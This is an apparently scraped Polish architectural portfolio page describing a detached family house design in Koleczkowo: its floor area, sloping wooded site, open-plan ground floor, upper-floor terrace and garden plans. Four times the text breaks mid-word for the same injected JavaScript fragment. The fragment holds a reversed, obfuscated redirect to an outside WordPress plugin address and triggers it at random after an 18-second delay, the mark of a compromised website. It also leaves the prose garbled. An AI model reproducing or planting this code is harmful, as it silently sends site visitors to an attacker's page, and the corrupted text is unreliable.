BUDYNEK JEDNORODZINNY WOLNOSTOJĄCY, UL.SŁONECZNA W KOLECZKOWIE

DOM W KOLECZKOWIE
DOM W KOLECZKOWIE
DOM W KOLECZKOWIE
DOM W KOLECZKOWIE
DOM W KOLECZKOWIE
DOM W KOLECZKOWIE
DOM KOLECZKOWIE
DOM KOLECZKOWIE

[23]

INWESTOR:  PRYWATNY

LOKALIZACJA:  KOLECZKOWO, GM.SZEMUD

FAZA:  PROJEKT BUDOWLANY

    POW.UŻYTKOWA: 167,7m2

    KUBATURA: 596,0m3

Aglomeracja pomorska objęta jest w sporej części zasięgiem Trójmiejskiego Parku Krajobrazowego na obrzeżach, którego w pasie Wzgórz Chwaszczyńskich położone jest Koleczkowo. Teren inwestycji o znacznym nachyleniu, porośnięty jest drzewami iglastymi, z otwartą ekspozycją od strony południowej na przyległe malownicze mokradła. Ze względu na kształt działki, zadrzewienie oraz otoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toczenie, dom usytuowano centralnie z północnym wejściem w podcieniu

Zaprojektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towany budynek dwukondygnacyjny z garażem, na parterze w układzie połączonego pokoju dziennego z hallem i kuchnią. Wrażenie otwartej przestrzeni potęgują duże przeszklenia, umożliwiające wyjście na taras i działkę. Centralnie zlokalizowany kominek z wkładem, tworzy ciepłą i przytulną atmosferę.

Na piętrze nad garażem , dodatkowo przewidzieliśmy drugi taras. Ze względu na układ pomieszczeń, kondygnacje mogę funkcjonować niezależnie. Zaplanowaliśmy na piętrze oprócz dwóch sypialni, łazienkę garderobę i kuchnię dostępne z przestronnego hallu.

Działkę od strony dróg, częściowo wygradzają zastoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane kamienne gabiony oraz przęsła drewniane dopełnione zielenią. W przyszłości na ogrodzie planowany jest kaskadowy podświetlany strumień wpadającym do oczka wodnego, oraz wolnostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tojąca pergola grillowa.